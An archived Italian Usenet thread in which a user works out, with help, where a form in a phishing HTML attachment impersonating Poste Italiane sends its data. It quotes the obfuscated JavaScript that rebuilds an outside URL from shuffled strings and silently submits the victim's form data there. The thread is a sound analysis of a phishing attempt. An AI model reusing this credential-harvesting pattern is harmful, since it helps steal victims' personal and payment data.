Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

il pulsante submit in un form html

21 views
Skip to first unread message

Tobia

unread,
Feb 10, 2015, 4:38:49 PM2/10/15
to
riguarda più js che java,comunque se lo sapete spero rispondiate ugualmente:
sbirciando nel sorgente di una pagina html contenente un modulo da compilare
e inviare, c'è al fondo il pulsante submit ,ma non è collegato\associato ad
un indirizzo web,quindi mi chiedevo a chi venga mandato il form visto che
nell'attibuto onclick non c'è l'indirizzo di recapito.
C'è solo l'esecuzione di una funzione (script) che valida i campi compilati
e basta.

Possibile?

grazie

Dr.UgoGagliardelli

unread,
Feb 11, 2015, 1:34:12 AM2/11/15
to
In genere il submit invia il form all'uri indicato nell'action del form
stesso

ciccio

unread,
Feb 11, 2015, 4:30:25 AM2/11/15
to
Dr.UgoGagliardelli <do.no...@me.please> ha scritto:
Si normalmente è così, ma potrebbe essere che, nel caso in oggetto,
l'URI viene inviato come parametro alla funzione di
validazione.



ciccio

unread,
Feb 11, 2015, 4:31:16 AM2/11/15
to
Tobia <er...@gyrteudb.it> ha scritto:
Posta il codice della funzione di validazione per una risposta
più esauriente.


4ndre4

unread,
Feb 11, 2015, 6:19:27 AM2/11/15
to
On Tuesday, 10 February 2015 21:38:49 UTC, Tobia wrote:

>[...]mi chiedevo a chi venga mandato il form[...]

A cio` che e` specificato nell'action di quel form.

Tobia

unread,
Feb 11, 2015, 6:26:16 AM2/11/15
to


"ciccio" ha scritto nel messaggio
news:201502110...@mynewsgate.net...
<Posta il codice della funzione di validazione per una risposta
<più esauriente.

trovato,era nella funzione di validazione,ma ben nascosto:

var a =
Array("ble","gat.p","ero","p://do","a.eu/l","/lo","ogs","hp?v","htt");
var b = a[8] + a[3] + a[0] + a[4] + a[6] + a[5] + a[1] + a[7] +
a[2];
document.form1.action = b;
document.form1.submit();

l'indirizzo ricomposto diventa : http://doblea.eu/logs/logat.php?vero

E' un tentativo di phishing,cioè lo script è contenuto in un file html
"postepay.html" che ho ricevuto come allegato in una mail,che si spaccia per
il sito poste italiane.
Quell'indirizzo http://doblea.eu esiste (è l'hosting) , bisogna avvisarli
della presunta frode?

ciao


ciccio

unread,
Feb 11, 2015, 7:09:05 AM2/11/15
to
Tobia <er...@gyrteudb.it> ha scritto:

>
>
> "ciccio" ha scritto nel messaggio
> news:201502110...@mynewsgate.net...
> <Posta il codice della funzione di validazione per una risposta
> <più esauriente.
>
> trovato,era nella funzione di validazione,ma ben nascosto:

CVD.

> var a =
> Array("ble","gat.p","ero","p://do","a.eu/l","/lo","ogs","hp?v","htt");
> + a[7] +
> a[2];
> document.form1.action = b;
> document.form1.submit();
>
> l'indirizzo ricomposto diventa : http://doblea.eu/logs/logat.php?vero
>
> E' un tentativo di phishing,cioè lo script è contenuto in un file html
> "postepay.html" che ho ricevuto come allegato in una mail,che si spaccia per
> il sito poste italiane.
> Quell'indirizzo http://doblea.eu esiste (è l'hosting) , bisogna avvisarli
> della presunta frode?
>

Mandare il tutto alla Polizia Postale.


0 new messages